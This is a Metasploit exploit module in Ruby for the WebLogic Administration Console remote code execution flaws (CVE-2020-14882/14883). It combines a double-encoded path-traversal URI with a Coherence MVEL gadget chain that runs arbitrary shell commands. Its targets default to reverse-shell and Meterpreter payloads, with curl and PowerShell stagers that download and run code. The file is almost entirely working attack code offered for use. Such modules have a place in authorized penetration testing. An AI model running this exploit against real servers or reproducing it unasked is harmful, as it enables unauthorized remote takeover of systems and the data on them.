## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Powershell def initialize(info = {}) super( update_info( info, 'Name' => 'Oracle WebLogic Server Administration Console Handle RCE', 'Description' => %q{ This module exploits a path traversal and a Java class instantiation in the handle implementation of WebLogic's Administration Console to execute code as the WebLogic user. Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 are known to be affected. Tested against 12.2.1.3.0 from Vulhub (Linux) and on Windows. Warning! Multiple sessions may be created by exploiting this vuln. }, 'Author' => [ 'voidfyoo', # Discovery 'Jang', # Analysis and PoC 'wvu' # Module ], 'References' => [ ['CVE', '2020-14882'], # Auth bypass? ['CVE', '2020-14883'], # RCE? ['CVE', '2020-14750'], # Patch bypass ['EDB', '48971'], # An exploit ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'], ['URL', 'https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf'] ], 'DisclosureDate' => '2020-10-20', # Vendor advisory 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux', 'win'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python_ssl' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => { 'CMDSTAGER::FLAVOR' => :curl, 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' } } ], [ 'Windows Command', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Type' => :win_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } } ], [ 'Windows Dropper', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper, 'DefaultOptions' => { 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https' } } ], [ 'PowerShell Stager', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :psh_stager, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' } } ] ], 'DefaultTarget' => 4, 'DefaultOptions' => { 'WfsDelay' => 10 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ Opt::RPORT(7001), OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = execute_command('') unless res return CheckCode::Unknown('Target did not respond to check.') end if res.code == 200 && res.body.include?('Deploying Application') raise RuntimeError end unless res.code == 302 && res.body.include?('UnexpectedExceptionPage') return CheckCode::Safe('Path traversal failed.') end CheckCode::Vulnerable('Path traversal successful.') rescue RuntimeError vprint_error('Application is deploying, sleeping and retrying check') sleep(1) retry end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd, :win_cmd execute_command(payload.encoded) when :linux_dropper, :win_dropper execute_cmdstager when :psh_stager execute_command(cmd_psh_payload( payload.encoded, payload.arch.first, remove_comspec: true )) end end def execute_command(cmd, _opts = {}) vprint_status("Executing command: #{cmd}") unless cmd.empty? send_request_cgi( 'method' => 'POST', 'uri' => aperture_science_handheld_portal_device, 'vars_post' => { 'handle' => coherence_gadget_chain(cmd) } ) end def coherence_gadget_chain(cmd) <<~JAVA.tr("\n", '').gsub(' ', '') com.tangosol.coherence.mvel2.sh.ShellSession(' java.lang.Runtime.getRuntime().exec( new java.lang.String[] { #{win_target? ? '"cmd.exe", "/c", ' : '"/bin/sh", "-c", '} new java.lang.String( java.util.Base64.getDecoder().decode("#{Rex::Text.encode_base64(cmd)}") ) } ) ') JAVA end def aperture_science_handheld_portal_device normalize_uri(target_uri.path, '/console/css/.%252e/console.portal') end def win_target? target.platform.names.first == 'Windows' end end